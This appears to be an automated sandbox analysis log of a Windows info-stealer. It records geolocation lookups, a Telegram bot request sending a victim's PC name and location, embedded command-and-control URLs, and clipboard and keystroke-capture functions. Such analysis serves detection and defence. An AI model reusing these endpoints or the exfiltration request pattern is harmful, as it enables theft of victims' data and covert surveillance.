                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 10 Jan 2025 22:44:22 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 10 Jan 2025 22:44:38 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20a
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003251000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enDze
                Source: RegSvcs.exe, 00000002.00000002.4172452396.0000000003291000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enDzh
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000328C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000324C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlBdq
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003134000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003134000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.000000000312E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003134000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000428E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000040DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004240000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000424E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004356000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004275000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000409C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004200000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004497000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: RegSvcs.exe, 00000002.00000002.4175379546.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000421B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004371000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004246000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000448F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000041DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004207000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004332000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000444F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000428E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000040DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004240000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000424E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004356000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004275000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000409C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004200000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004497000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: RegSvcs.exe, 00000002.00000002.4175379546.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000421B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004371000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004246000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000448F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000041DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004207000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004332000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000444F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003282000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003273000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003282000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/Dze
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000032C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/Dzh
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000032BD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000327D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lBdq
                Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00F54164
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_00604164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00604164
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F53F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F53F66
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F4001C
